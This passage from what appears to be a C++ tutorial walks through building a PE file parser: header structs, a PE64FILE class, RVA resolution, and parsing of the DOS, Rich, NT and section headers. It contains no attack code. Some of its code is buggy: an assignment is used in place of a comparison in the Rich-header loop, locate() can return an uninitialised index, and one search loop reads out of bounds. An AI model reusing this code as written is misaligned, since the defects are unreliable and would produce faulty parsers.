} ___IMAGE_BASE_RELOCATION, * ___PIMAGE_BASE_RELOCATION;

typedef struct __IMAGE_SECTION_HEADER {
    BYTE    Name[___IMAGE_SIZEOF_SHORT_NAME];
    union {
        DWORD   PhysicalAddress;
        DWORD   VirtualSize;
    } Misc;
    DWORD   VirtualAddress;
    DWORD   SizeOfRawData;
    DWORD   PointerToRawData;
    DWORD   PointerToRelocations;
    DWORD   PointerToLinenumbers;
    WORD    NumberOfRelocations;
    WORD    NumberOfLinenumbers;
    DWORD   Characteristics;
} ___IMAGE_SECTION_HEADER, * ___PIMAGE_SECTION_HEADER;

Custom Structures

I defined the following structures to help with the parsing process. They’re defined in the PEFILE_CUSTOM_STRUCTS.h header.

RICH_HEADER_INFO

A structure to hold information about the Rich Header during processing.

typedef struct __RICH_HEADER_INFO {
    int size;
    char* ptrToBuffer;
    int entries;
} RICH_HEADER_INFO, * PRICH_HEADER_INFO;
  • size: Size of the Rich Header (in bytes).
  • ptrToBuffer: A pointer to the buffer containing the data of the Rich Header.
  • entries: Number of entries in the Rich Header.
RICH_HEADER_ENTRY

A structure to represent a Rich Header entry.

typedef struct __RICH_HEADER_ENTRY {
    WORD  prodID;
    WORD  buildID;
    DWORD useCount;
} RICH_HEADER_ENTRY, * PRICH_HEADER_ENTRY;
  • prodID: Type ID / Product ID.
  • buildID: Build ID.
  • useCount: Use count.
RICH_HEADER

A structure to represent the Rich Header.

typedef struct __RICH_HEADER {
    PRICH_HEADER_ENTRY entries;
} RICH_HEADER, * PRICH_HEADER;
  • entries: A pointer to a RICH_HEADER_ENTRY array.
ILT_ENTRY_32

A structure to represent a 32-bit ILT entry during processing.

typedef struct __ILT_ENTRY_32 {
    union {
        DWORD ORDINAL : 16;
        DWORD HINT_NAME_TABE : 32;
        DWORD ORDINAL_NAME_FLAG : 1;
    } FIELD_1;
} ILT_ENTRY_32, * PILT_ENTRY_32;

The structure will hold a 32-bit value and will return the appropriate piece of information (using bit fields) when the member corresponding to that piece of information is accessed.

ILT_ENTRY_64

A structure to represent a 64-bit ILT entry during processing.

typedef struct __ILT_ENTRY_64 {
    union {
        DWORD ORDINAL : 16;
        DWORD HINT_NAME_TABE : 32;
    } FIELD_2;
    DWORD ORDINAL_NAME_FLAG : 1;
} ILT_ENTRY_64, * PILT_ENTRY_64;

The structure will hold a 64-bit value and will return the appropriate piece of information (using bit fields) when the member corresponding to that piece of information is accessed.

BASE_RELOC_ENTRY

A structure to represent a base relocation entry during processing.

typedef struct __BASE_RELOC_ENTRY {
    WORD OFFSET : 12;
    WORD TYPE : 4;
} BASE_RELOC_ENTRY, * PBASE_RELOC_ENTRY;
  • OFFSET: Relocation offset.
  • TYPE: Relocation type.

PEFILE

Our parser will represent a PE file as an object type of either PE32FILE or PE64FILE.
These 2 classes only differ in some member definitions but their functionality is identical.
Throughout this post we will use the code from PE64FILE.

Definition

The class is defined as follows:

class PE64FILE
{
public:
    PE64FILE(char* _NAME, FILE* Ppefile);
	
    void PrintInfo();

private:
    char* NAME;
    FILE* Ppefile;
    int _import_directory_count, _import_directory_size;
    int _basreloc_directory_count;

    // HEADERS
    ___IMAGE_DOS_HEADER     PEFILE_DOS_HEADER;
    ___IMAGE_NT_HEADERS64   PEFILE_NT_HEADERS;

    // DOS HEADER
    DWORD PEFILE_DOS_HEADER_EMAGIC;
    LONG  PEFILE_DOS_HEADER_LFANEW;

    // RICH HEADER
    RICH_HEADER_INFO PEFILE_RICH_HEADER_INFO;
    RICH_HEADER PEFILE_RICH_HEADER;

    // NT_HEADERS.Signature
    DWORD PEFILE_NT_HEADERS_SIGNATURE;

    // NT_HEADERS.FileHeader
    WORD PEFILE_NT_HEADERS_FILE_HEADER_MACHINE;
    WORD PEFILE_NT_HEADERS_FILE_HEADER_NUMBER0F_SECTIONS;
    WORD PEFILE_NT_HEADERS_FILE_HEADER_SIZEOF_OPTIONAL_HEADER;

    // NT_HEADERS.OptionalHeader
    DWORD PEFILE_NT_HEADERS_OPTIONAL_HEADER_MAGIC;
    DWORD PEFILE_NT_HEADERS_OPTIONAL_HEADER_SIZEOF_CODE;
    DWORD PEFILE_NT_HEADERS_OPTIONAL_HEADER_SIZEOF_INITIALIZED_DATA;
    DWORD PEFILE_NT_HEADERS_OPTIONAL_HEADER_SIZEOF_UNINITIALIZED_DATA;
    DWORD PEFILE_NT_HEADERS_OPTIONAL_HEADER_ADDRESSOF_ENTRYPOINT;
    DWORD PEFILE_NT_HEADERS_OPTIONAL_HEADER_BASEOF_CODE;
    ULONGLONG PEFILE_NT_HEADERS_OPTIONAL_HEADER_IMAGEBASE;
    DWORD PEFILE_NT_HEADERS_OPTIONAL_HEADER_SECTION_ALIGNMENT;
    DWORD PEFILE_NT_HEADERS_OPTIONAL_HEADER_FILE_ALIGNMENT;
    DWORD PEFILE_NT_HEADERS_OPTIONAL_HEADER_SIZEOF_IMAGE;
    DWORD PEFILE_NT_HEADERS_OPTIONAL_HEADER_SIZEOF_HEADERS;

    ___IMAGE_DATA_DIRECTORY PEFILE_EXPORT_DIRECTORY;
    ___IMAGE_DATA_DIRECTORY PEFILE_IMPORT_DIRECTORY;
    ___IMAGE_DATA_DIRECTORY PEFILE_RESOURCE_DIRECTORY;
    ___IMAGE_DATA_DIRECTORY PEFILE_EXCEPTION_DIRECTORY;
    ___IMAGE_DATA_DIRECTORY PEFILE_SECURITY_DIRECTORY;
    ___IMAGE_DATA_DIRECTORY PEFILE_BASERELOC_DIRECTORY;
    ___IMAGE_DATA_DIRECTORY PEFILE_DEBUG_DIRECTORY;
    ___IMAGE_DATA_DIRECTORY PEFILE_ARCHITECTURE_DIRECTORY;
    ___IMAGE_DATA_DIRECTORY PEFILE_GLOBALPTR_DIRECTORY;
    ___IMAGE_DATA_DIRECTORY PEFILE_TLS_DIRECTORY;
    ___IMAGE_DATA_DIRECTORY PEFILE_LOAD_CONFIG_DIRECTORY;
    ___IMAGE_DATA_DIRECTORY PEFILE_BOUND_IMPORT_DIRECTORY;
    ___IMAGE_DATA_DIRECTORY PEFILE_IAT_DIRECTORY;
    ___IMAGE_DATA_DIRECTORY PEFILE_DELAY_IMPORT_DIRECTORY;
    ___IMAGE_DATA_DIRECTORY PEFILE_COM_DESCRIPTOR_DIRECTORY;

    // SECTION HEADERS
    ___PIMAGE_SECTION_HEADER PEFILE_SECTION_HEADERS;

    // IMPORT TABLE
    ___PIMAGE_IMPORT_DESCRIPTOR PEFILE_IMPORT_TABLE;
    
    // BASE RELOCATION TABLE
    ___PIMAGE_BASE_RELOCATION PEFILE_BASERELOC_TABLE;

    // FUNCTIONS
    
    // ADDRESS RESOLVERS
    int  locate(DWORD VA);
    DWORD resolve(DWORD VA, int index);

    // PARSERS
    void ParseFile();
    void ParseDOSHeader();
    void ParseNTHeaders();
    void ParseSectionHeaders();
    void ParseImportDirectory();
    void ParseBaseReloc();
    void ParseRichHeader();

    // PRINT INFO
    void PrintFileInfo();
    void PrintDOSHeaderInfo();
    void PrintRichHeaderInfo();
    void PrintNTHeadersInfo();
    void PrintSectionHeadersInfo();
    void PrintImportTableInfo();
    void PrintBaseRelocationsInfo();
};

The only public member beside the class constructor is a function called printInfo() which will print information about the file.

The class constructor takes two parameters, a char array representing the name of the file and a file pointer to the actual data of the file.

After that comes a long series of variables definitions, these class members are going to be used internally during the parsing process and we’ll mention each one of them later.

In the end is a series of methods definitions, first two methods are called locate and resolve, I will talk about them in a minute.
The rest are functions responsible for parsing different parts of the file, and functions responsible for printing information about the same parts.

Constructor

The constructor of the class simply sets the file pointer and name variables, then it calls the ParseFile() function.

PE64FILE::PE64FILE(char* _NAME, FILE* _Ppefile) {
	
	NAME = _NAME;
	Ppefile = _Ppefile;

	ParseFile();

}

The ParseFile() function calls the other parser functions:

void PE64FILE::ParseFile() {

	// PARSE DOS HEADER
	ParseDOSHeader();

	// PARSE RICH HEADER
	ParseRichHeader();

	//PARSE NT HEADERS
	ParseNTHeaders();

	// PARSE SECTION HEADERS
	ParseSectionHeaders();

	// PARSE IMPORT DIRECTORY
	ParseImportDirectory();

	// PARSE BASE RELOCATIONS
	ParseBaseReloc();

}

Resolving RVAs

Most of the time, we’ll have a RVA that we’ll need to change to a file offset.
The process of resolving an RVA can be outlined as follows:

  1. Determine which section range contains that RVA:
    • Iterate over all sections and for each section compare the RVA to the section virtual address and to the section virtual address added to the virtual size of the section.
    • If the RVA exists within this range then it belongs to that section.
  2. Calculate the file offset:
    • Subtract the RVA from the section virtual address.
    • Add that value to the raw data pointer of the section.

An example of this is locating a Data Directory.
The IMAGE_DATA_DIRECTORY structure only gives us an RVA of the directory, to locate that directory we’ll need to resolve that address.

I wrote two functions to do this, first one to locate the virtual address (locate()), second one to resolve the address (resolve()).

int PE64FILE::locate(DWORD VA) {
	
	int index;
	
	for (int i = 0; i < PEFILE_NT_HEADERS_FILE_HEADER_NUMBER0F_SECTIONS; i++) {
		if (VA >= PEFILE_SECTION_HEADERS[i].VirtualAddress
			&& VA < (PEFILE_SECTION_HEADERS[i].VirtualAddress + PEFILE_SECTION_HEADERS[i].Misc.VirtualSize)){
			index = i;
			break;
		}
	}
	return index;
}

DWORD PE64FILE::resolve(DWORD VA, int index) {

	return (VA - PEFILE_SECTION_HEADERS[index].VirtualAddress) + PEFILE_SECTION_HEADERS[index].PointerToRawData;

}

locate() iterates over the PEFILE_SECTION_HEADERS array, compares the RVA as described above, then it returns the index of the appropriate section header within the PEFILE_SECTION_HEADERS array.

Please note that in order for these functions to work we’ll need to parse out the section headers and fill the PEFILE_SECTION_HEADERS array first.
We still haven’t discussed this part, but I wanted to talk about the address resolvers first.

main function

The main function of the program is fairly simple, it only does 2 things:

  • Create a file pointer to the given file, and validate that the file was read correctly.
  • Call INITPARSE() on the file, and based on the return value it decides between three actions:
    • Exit.
    • Create a PE32FILE object, call PrintInfo(), close the file pointer then exit.
    • Create a PE64FILE object, call PrintInfo(), close the file pointer then exit.

PrintInfo() calls the other print info functions.

int main(int argc, char* argv[])
{
	if (argc != 2) {
		printf("Usage: %s [path to executable]\n", argv[0]);
		return 1;
	}

	FILE * PpeFile;
	fopen_s(&PpeFile, argv[1], "rb");

	if (PpeFile == NULL) {
		printf("Can't open file.\n");
		return 1;
	}

	if (INITPARSE(PpeFile) == 1) {
		exit(1);
	}
	else if (INITPARSE(PpeFile) == 32) {
		PE32FILE PeFile_1(argv[1], PpeFile);
		PeFile_1.PrintInfo();
		fclose(PpeFile);
		exit(0);
	}
	else if (INITPARSE(PpeFile) == 64) {
		PE64FILE PeFile_1(argv[1], PpeFile);
		PeFile_1.PrintInfo();
		fclose(PpeFile);
		exit(0);
	}

	return 0;
}

INITPARSE()

INITPARSE() is a function defined in PEFILE.cpp.
Its only job is to validate that the given file is a PE file, then determine whether the file is PE32 or PE32+.

It reads the DOS header of the file and checks the DOS MZ header, if not found it returns an error.

After validating the PE file, it sets the file position to (DOS_HEADER.e_lfanew + size of DWORD (PE signature) + size of the file header) which is the exact offset of the beginning of the Optional Header.
Then it reads a WORD, we know that the first WORD of the Optional Header is a magic value that indicates the file type, it then compares that word to IMAGE_NT_OPTIONAL_HDR32_MAGIC and IMAGE_NT_OPTIONAL_HDR64_MAGIC, and based on the comparison results it either returns 32 or 64 indicating PE32 or PE32+, or it returns an error.

int INITPARSE(FILE* PpeFile) {

	___IMAGE_DOS_HEADER TMP_DOS_HEADER;
	WORD PEFILE_TYPE;

	fseek(PpeFile, 0, SEEK_SET);
	fread(&TMP_DOS_HEADER, sizeof(___IMAGE_DOS_HEADER), 1, PpeFile);

	if (TMP_DOS_HEADER.e_magic != ___IMAGE_DOS_SIGNATURE) {
		printf("Error. Not a PE file.\n");
		return 1;
	}

	fseek(PpeFile, (TMP_DOS_HEADER.e_lfanew + sizeof(DWORD) + sizeof(___IMAGE_FILE_HEADER)), SEEK_SET);
	fread(&PEFILE_TYPE, sizeof(WORD), 1, PpeFile);

	if (PEFILE_TYPE == ___IMAGE_NT_OPTIONAL_HDR32_MAGIC) {
		return 32;
	}
	else if (PEFILE_TYPE == ___IMAGE_NT_OPTIONAL_HDR64_MAGIC) {
		return 64;
	}
	else {
		printf("Error while parsing IMAGE_OPTIONAL_HEADER.Magic. Unknown Type.\n");
		return 1;
	}

}

Parsing DOS Header

ParseDOSHeader()

Parsing out the DOS Header is nothing complicated, we just need to read from the beginning of the file an amount of bytes equal to the size of the DOS Header, then we can assign that data to the pre-defined class member PEFILE_DOS_HEADER.
From there we can access all of the struct members, however we’re only interested in e_magic and e_lfanew.

void PE64FILE::ParseDOSHeader() {
	
	fseek(Ppefile, 0, SEEK_SET);
	fread(&PEFILE_DOS_HEADER, sizeof(___IMAGE_DOS_HEADER), 1, Ppefile);

	PEFILE_DOS_HEADER_EMAGIC = PEFILE_DOS_HEADER.e_magic;
	PEFILE_DOS_HEADER_LFANEW = PEFILE_DOS_HEADER.e_lfanew;

}

PrintDOSHeaderInfo()

This function prints e_magic and e_lfanew values.

void PE64FILE::PrintDOSHeaderInfo() {
	
	printf(" DOS HEADER:\n");
	printf(" -----------\n\n");

	printf(" Magic: 0x%X\n", PEFILE_DOS_HEADER_EMAGIC);
	printf(" File address of new exe header: 0x%X\n", PEFILE_DOS_HEADER_LFANEW);

}


Parsing Rich Header

Process

To parse out the Rich Header we’ll need to go through multiple steps.

We don’t know anything about the Rich Header, we don’t know its size, we don’t know where it’s exactly located, we don’t even know if the file we’re processing contains a Rich Header in the first place.

First of all, we need to locate the Rich Header.
We don’t know the exact location, however we have everything we need to locate it.
We know that if a Rich Header exists, then it has to exist between the DOS Stub and the PE signature or the beginning of the NT Headers.
We also know that any Rich Header ends with a 32-bit value Rich followed by the XOR key.

One might rely on the fixed size of the DOS Header and the DOS Stub, however, the default DOS Stub message can be changed, so that size is not guaranteed to be fixed.
A better approach would be to read from the beginning of the file to the start of the NT Headers, then search through that buffer for the Rich sequence, if found then we’ve successfully located the end of the Rich Header, if not found then most likely the file doesn’t contain a Rich Header.

Once we’ve located the end of the Rich Header, we can read the XOR key, then go backwards starting from the Rich signature and keep XORing 4 bytes at a time until we reach the DanS signature which indicates the beginning of the Rich Header.

After obtaining the position and the size of the Rich Header, we can normally read and process the data.

ParseRichHeader()

This function starts by allocating a buffer on the heap, then it reads e_lfanew size of bytes from the beginning of the file and stores the data in the allocated buffer.

It then goes through a loop where it does a linear search byte by byte. In each iteration it compares the current byte and the byte the follows to 0x52 (R) and 0x69 (i).
When the sequence is found, it stores the index in a variable then the loop breaks.

	char* dataPtr = new char[PEFILE_DOS_HEADER_LFANEW];
	fseek(Ppefile, 0, SEEK_SET);
	fread(dataPtr, PEFILE_DOS_HEADER_LFANEW, 1, Ppefile);

	int index_ = 0;

	for (int i = 0; i <= PEFILE_DOS_HEADER_LFANEW; i++) {
		if (dataPtr[i] == 0x52 && dataPtr[i + 1] == 0x69) {
			index_ = i;
			break;
		}
	}

	if (index_ == 0) {
		printf("Error while parsing Rich Header.");
		PEFILE_RICH_HEADER_INFO.entries = 0;
		return;
	}

After that it reads the XOR key, then goes into the decryption loop where in each iteration it increments RichHeaderSize by 4 until it reaches the DanS sequence.

	char key[4];
	memcpy(key, dataPtr + (index_ + 4), 4);

	int indexpointer = index_ - 4;
	int RichHeaderSize = 0;

	while (true) {
		char tmpchar[4];
		memcpy(tmpchar, dataPtr + indexpointer, 4);

		for (int i = 0; i < 4; i++) {
			tmpchar[i] = tmpchar[i] ^ key[i];
		}

		indexpointer -= 4;
		RichHeaderSize += 4;

		if (tmpchar[1] = 0x61 && tmpchar[0] == 0x44) {
			break;
		}
	}

After obtaining the size and the position, it allocates a new buffer for the Rich Header, reads and decrypts the Rich Header, updates PEFILE_RICH_HEADER_INFO with the appropriate data pointer, size and number of entries, then finally it deallocates the buffer it was using for processing.

	char* RichHeaderPtr = new char[RichHeaderSize];
	memcpy(RichHeaderPtr, dataPtr + (index_ - RichHeaderSize), RichHeaderSize);

	for (int i = 0; i < RichHeaderSize; i += 4) {

		for (int x = 0; x < 4; x++) {
			RichHeaderPtr[i + x] = RichHeaderPtr[i + x] ^ key[x];
		}

	}

	PEFILE_RICH_HEADER_INFO.size = RichHeaderSize;
	PEFILE_RICH_HEADER_INFO.ptrToBuffer = RichHeaderPtr;
	PEFILE_RICH_HEADER_INFO.entries = (RichHeaderSize - 16) / 8;

	delete[] dataPtr;

The rest of the function reads each entry of the Rich Header and updates PEFILE_RICH_HEADER.

	PEFILE_RICH_HEADER.entries = new RICH_HEADER_ENTRY[PEFILE_RICH_HEADER_INFO.entries];

	for (int i = 16; i < RichHeaderSize; i += 8) {
		WORD PRODID = (uint16_t)((unsigned char)RichHeaderPtr[i + 3] << 8) | (unsigned char)RichHeaderPtr[i + 2];
		WORD BUILDID = (uint16_t)((unsigned char)RichHeaderPtr[i + 1] << 8) | (unsigned char)RichHeaderPtr[i];
		DWORD USECOUNT = (uint32_t)((unsigned char)RichHeaderPtr[i + 7] << 24) | (unsigned char)RichHeaderPtr[i + 6] << 16 | (unsigned char)RichHeaderPtr[i + 5] << 8 | (unsigned char)RichHeaderPtr[i + 4];
		PEFILE_RICH_HEADER.entries[(i / 8) - 2] = {
			PRODID,
			BUILDID,
			USECOUNT
		};

		if (i + 8 >= RichHeaderSize) {
			PEFILE_RICH_HEADER.entries[(i / 8) - 1] = { 0x0000, 0x0000, 0x00000000 };
		}

	}

	delete[] PEFILE_RICH_HEADER_INFO.ptrToBuffer;

Here’s the full function:

void PE64FILE::ParseRichHeader() {
	
	char* dataPtr = new char[PEFILE_DOS_HEADER_LFANEW];
	fseek(Ppefile, 0, SEEK_SET);
	fread(dataPtr, PEFILE_DOS_HEADER_LFANEW, 1, Ppefile);

	int index_ = 0;

	for (int i = 0; i <= PEFILE_DOS_HEADER_LFANEW; i++) {
		if (dataPtr[i] == 0x52 && dataPtr[i + 1] == 0x69) {
			index_ = i;
			break;
		}
	}

	if (index_ == 0) {
		printf("Error while parsing Rich Header.");
		PEFILE_RICH_HEADER_INFO.entries = 0;
		return;
	}

	char key[4];
	memcpy(key, dataPtr + (index_ + 4), 4);

	int indexpointer = index_ - 4;
	int RichHeaderSize = 0;

	while (true) {
		char tmpchar[4];
		memcpy(tmpchar, dataPtr + indexpointer, 4);

		for (int i = 0; i < 4; i++) {
			tmpchar[i] = tmpchar[i] ^ key[i];
		}

		indexpointer -= 4;
		RichHeaderSize += 4;

		if (tmpchar[1] = 0x61 && tmpchar[0] == 0x44) {
			break;
		}
	}

	char* RichHeaderPtr = new char[RichHeaderSize];
	memcpy(RichHeaderPtr, dataPtr + (index_ - RichHeaderSize), RichHeaderSize);

	for (int i = 0; i < RichHeaderSize; i += 4) {

		for (int x = 0; x < 4; x++) {
			RichHeaderPtr[i + x] = RichHeaderPtr[i + x] ^ key[x];
		}

	}

	PEFILE_RICH_HEADER_INFO.size = RichHeaderSize;
	PEFILE_RICH_HEADER_INFO.ptrToBuffer = RichHeaderPtr;
	PEFILE_RICH_HEADER_INFO.entries = (RichHeaderSize - 16) / 8;

	delete[] dataPtr;

	PEFILE_RICH_HEADER.entries = new RICH_HEADER_ENTRY[PEFILE_RICH_HEADER_INFO.entries];

	for (int i = 16; i < RichHeaderSize; i += 8) {
		WORD PRODID = (uint16_t)((unsigned char)RichHeaderPtr[i + 3] << 8) | (unsigned char)RichHeaderPtr[i + 2];
		WORD BUILDID = (uint16_t)((unsigned char)RichHeaderPtr[i + 1] << 8) | (unsigned char)RichHeaderPtr[i];
		DWORD USECOUNT = (uint32_t)((unsigned char)RichHeaderPtr[i + 7] << 24) | (unsigned char)RichHeaderPtr[i + 6] << 16 | (unsigned char)RichHeaderPtr[i + 5] << 8 | (unsigned char)RichHeaderPtr[i + 4];
		PEFILE_RICH_HEADER.entries[(i / 8) - 2] = {
			PRODID,
			BUILDID,
			USECOUNT
		};

		if (i + 8 >= RichHeaderSize) {
			PEFILE_RICH_HEADER.entries[(i / 8) - 1] = { 0x0000, 0x0000, 0x00000000 };
		}

	}

	delete[] PEFILE_RICH_HEADER_INFO.ptrToBuffer;

}

PrintRichHeaderInfo()

This function iterates over each entry in PEFILE_RICH_HEADER and prints its value.

void PE64FILE::PrintRichHeaderInfo() {
	
	printf(" RICH HEADER:\n");
	printf(" ------------\n\n");

	for (int i = 0; i < PEFILE_RICH_HEADER_INFO.entries; i++) {
		printf(" 0x%X 0x%X 0x%X: %d.%d.%d\n",
			PEFILE_RICH_HEADER.entries[i].buildID,
			PEFILE_RICH_HEADER.entries[i].prodID,
			PEFILE_RICH_HEADER.entries[i].useCount,
			PEFILE_RICH_HEADER.entries[i].buildID,
			PEFILE_RICH_HEADER.entries[i].prodID,
			PEFILE_RICH_HEADER.entries[i].useCount);
	}

}


Parsing NT Headers

ParseNTHeaders()

Similar to the DOS Header, all we need to do is to read from e_lfanew an amount of bytes equal to the size of IMAGE_NT_HEADERS.

After that we can parse out the contents of the File Header and the Optional Header.

The Optional Header contains an array of IMAGE_DATA_DIRECTORY structures which we care about.
To parse out this information, we can use the IMAGE_DIRECTORY_[...] constants defined in winnt.h as array indexes to access the corresponding IMAGE_DATA_DIRECTORY structure of each Data Directory.

void PE64FILE::ParseNTHeaders() {
	
	fseek(Ppefile, PEFILE_DOS_HEADER.e_lfanew, SEEK_SET);
	fread(&PEFILE_NT_HEADERS, sizeof(PEFILE_NT_HEADERS), 1, Ppefile);

	PEFILE_NT_HEADERS_SIGNATURE = PEFILE_NT_HEADERS.Signature;

	PEFILE_NT_HEADERS_FILE_HEADER_MACHINE = PEFILE_NT_HEADERS.FileHeader.Machine;
	PEFILE_NT_HEADERS_FILE_HEADER_NUMBER0F_SECTIONS = PEFILE_NT_HEADERS.FileHeader.NumberOfSections;
	PEFILE_NT_HEADERS_FILE_HEADER_SIZEOF_OPTIONAL_HEADER = PEFILE_NT_HEADERS.FileHeader.SizeOfOptionalHeader;

	PEFILE_NT_HEADERS_OPTIONAL_HEADER_MAGIC = PEFILE_NT_HEADERS.OptionalHeader.Magic;
	PEFILE_NT_HEADERS_OPTIONAL_HEADER_SIZEOF_CODE = PEFILE_NT_HEADERS.OptionalHeader.SizeOfCode;
	PEFILE_NT_HEADERS_OPTIONAL_HEADER_SIZEOF_INITIALIZED_DATA = PEFILE_NT_HEADERS.OptionalHeader.SizeOfInitializedData;
	PEFILE_NT_HEADERS_OPTIONAL_HEADER_SIZEOF_UNINITIALIZED_DATA = PEFILE_NT_HEADERS.OptionalHeader.SizeOfUninitializedData;
	PEFILE_NT_HEADERS_OPTIONAL_HEADER_ADDRESSOF_ENTRYPOINT = PEFILE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint;
	PEFILE_NT_HEADERS_OPTIONAL_HEADER_BASEOF_CODE = PEFILE_NT_HEADERS.OptionalHeader.BaseOfCode;
	PEFILE_NT_HEADERS_OPTIONAL_HEADER_IMAGEBASE = PEFILE_NT_HEADERS.OptionalHeader.ImageBase;
	PEFILE_NT_HEADERS_OPTIONAL_HEADER_SECTION_ALIGNMENT = PEFILE_NT_HEADERS.OptionalHeader.SectionAlignment;
	PEFILE_NT_HEADERS_OPTIONAL_HEADER_FILE_ALIGNMENT = PEFILE_NT_HEADERS.OptionalHeader.FileAlignment;
	PEFILE_NT_HEADERS_OPTIONAL_HEADER_SIZEOF_IMAGE = PEFILE_NT_HEADERS.OptionalHeader.SizeOfImage;
	PEFILE_NT_HEADERS_OPTIONAL_HEADER_SIZEOF_HEADERS = PEFILE_NT_HEADERS.OptionalHeader.SizeOfHeaders;

	PEFILE_EXPORT_DIRECTORY = PEFILE_NT_HEADERS.OptionalHeader.DataDirectory[___IMAGE_DIRECTORY_ENTRY_EXPORT];
	PEFILE_IMPORT_DIRECTORY = PEFILE_NT_HEADERS.OptionalHeader.DataDirectory[___IMAGE_DIRECTORY_ENTRY_IMPORT];
	PEFILE_RESOURCE_DIRECTORY = PEFILE_NT_HEADERS.OptionalHeader.DataDirectory[___IMAGE_DIRECTORY_ENTRY_RESOURCE];
	PEFILE_EXCEPTION_DIRECTORY = PEFILE_NT_HEADERS.OptionalHeader.DataDirectory[___IMAGE_DIRECTORY_ENTRY_EXCEPTION];
	PEFILE_SECURITY_DIRECTORY = PEFILE_NT_HEADERS.OptionalHeader.DataDirectory[___IMAGE_DIRECTORY_ENTRY_SECURITY];
	PEFILE_BASERELOC_DIRECTORY = PEFILE_NT_HEADERS.OptionalHeader.DataDirectory[___IMAGE_DIRECTORY_ENTRY_BASERELOC];
	PEFILE_DEBUG_DIRECTORY = PEFILE_NT_HEADERS.OptionalHeader.DataDirectory[___IMAGE_DIRECTORY_ENTRY_DEBUG];
	PEFILE_ARCHITECTURE_DIRECTORY = PEFILE_NT_HEADERS.OptionalHeader.DataDirectory[___IMAGE_DIRECTORY_ENTRY_ARCHITECTURE];
	PEFILE_GLOBALPTR_DIRECTORY = PEFILE_NT_HEADERS.OptionalHeader.DataDirectory[___IMAGE_DIRECTORY_ENTRY_GLOBALPTR];
	PEFILE_TLS_DIRECTORY = PEFILE_NT_HEADERS.OptionalHeader.DataDirectory[___IMAGE_DIRECTORY_ENTRY_TLS];
	PEFILE_LOAD_CONFIG_DIRECTORY = PEFILE_NT_HEADERS.OptionalHeader.DataDirectory[___IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG];
	PEFILE_BOUND_IMPORT_DIRECTORY = PEFILE_NT_HEADERS.OptionalHeader.DataDirectory[___IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT];
	PEFILE_IAT_DIRECTORY = PEFILE_NT_HEADERS.OptionalHeader.DataDirectory[___IMAGE_DIRECTORY_ENTRY_IAT];
	PEFILE_DELAY_IMPORT_DIRECTORY = PEFILE_NT_HEADERS.OptionalHeader.DataDirectory[___IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT];
	PEFILE_COM_DESCRIPTOR_DIRECTORY = PEFILE_NT_HEADERS.OptionalHeader.DataDirectory[___IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR];

}

PrintNTHeadersInfo()

This function prints the data obtained from the File Header and the Optional Header, and for each Data Directory it prints its RVA and size.

void PE64FILE::PrintNTHeadersInfo() {
	
	printf(" NT HEADERS:\n");
	printf(" -----------\n\n");

	printf(" PE Signature: 0x%X\n", PEFILE_NT_HEADERS_SIGNATURE);

	printf("\n File Header:\n\n");
	printf("   Machine: 0x%X\n", PEFILE_NT_HEADERS_FILE_HEADER_MACHINE);
	printf("   Number of sections: 0x%X\n", PEFILE_NT_HEADERS_FILE_HEADER_NUMBER0F_SECTIONS);
	printf("   Size of optional header: 0x%X\n", PEFILE_NT_HEADERS_FILE_HEADER_SIZEOF_OPTIONAL_HEADER);

	printf("\n Optional Header:\n\n");
	printf("   Magic: 0x%X\n", PEFILE_NT_HEADERS_OPTIONAL_HEADER_MAGIC);
	printf("   Size of code section: 0x%X\n", PEFILE_NT_HEADERS_OPTIONAL_HEADER_SIZEOF_CODE);
	printf("   Size of initialized data: 0x%X\n", PEFILE_NT_HEADERS_OPTIONAL_HEADER_SIZEOF_INITIALIZED_DATA);
	printf("   Size of uninitialized data: 0x%X\n", PEFILE_NT_HEADERS_OPTIONAL_HEADER_SIZEOF_UNINITIALIZED_DATA);
	printf("   Address of entry point: 0x%X\n", PEFILE_NT_HEADERS_OPTIONAL_HEADER_ADDRESSOF_ENTRYPOINT);
	printf("   RVA of start of code section: 0x%X\n", PEFILE_NT_HEADERS_OPTIONAL_HEADER_BASEOF_CODE);
	printf("   Desired image base: 0x%X\n", PEFILE_NT_HEADERS_OPTIONAL_HEADER_IMAGEBASE);
	printf("   Section alignment: 0x%X\n", PEFILE_NT_HEADERS_OPTIONAL_HEADER_SECTION_ALIGNMENT);
	printf("   File alignment: 0x%X\n", PEFILE_NT_HEADERS_OPTIONAL_HEADER_FILE_ALIGNMENT);
	printf("   Size of image: 0x%X\n", PEFILE_NT_HEADERS_OPTIONAL_HEADER_SIZEOF_IMAGE);
	printf("   Size of headers: 0x%X\n", PEFILE_NT_HEADERS_OPTIONAL_HEADER_SIZEOF_HEADERS);

	printf("\n Data Directories:\n");
	printf("\n   * Export Directory:\n");
	printf("       RVA: 0x%X\n", PEFILE_EXPORT_DIRECTORY.VirtualAddress);
	printf("       Size: 0x%X\n", PEFILE_EXPORT_DIRECTORY.Size);
	.
	.
	[REDACTED]
	.
	.
	printf("\n   * COM Runtime Descriptor:\n");
	printf("       RVA: 0x%X\n", PEFILE_COM_DESCRIPTOR_DIRECTORY.VirtualAddress);
	printf("       Size: 0x%X\n", PEFILE_COM_DESCRIPTOR_DIRECTORY.Size);

}


Parsing Section Headers

ParseSectionHeaders()

This function starts by assigning the PEFILE_SECTION_HEADERS class member to a pointer to an IMAGE_SECTION_HEADER array of the count of PEFILE_NT_HEADERS_FILE_HEADER_NUMBEROF_SECTIONS.

Then it goes into a loop of PEFILE_NT_HEADERS_FILE_HEADER_NUMBEROF_SECTIONS iterations where in each iteration it changes the file offset to (e_lfanew + size of NT Headers + loop counter multiplied by the size of a section header) to reach the beginning of the next Section Header, then it reads the new Section Header and assigns it to the next element of PEFILE_SECTION_HEADERS.

void PE64FILE::ParseSectionHeaders() {
	
	PEFILE_SECTION_HEADERS = new ___IMAGE_SECTION_HEADER[PEFILE_NT_HEADERS_FILE_HEADER_NUMBER0F_SECTIONS];
	for (int i = 0; i < PEFILE_NT_HEADERS_FILE_HEADER_NUMBER0F_SECTIONS; i++) {
		int offset = (PEFILE_DOS_HEADER.e_lfanew + sizeof(PEFILE_NT_HEADERS)) + (i * ___IMAGE_SIZEOF_SECTION_HEADER);
		fseek(Ppefile, offset, SEEK_SET);
		fread(&PEFILE_SECTION_HEADERS[i], ___IMAGE_SIZEOF_SECTION_HEADER, 1, Ppefile);
	}

}

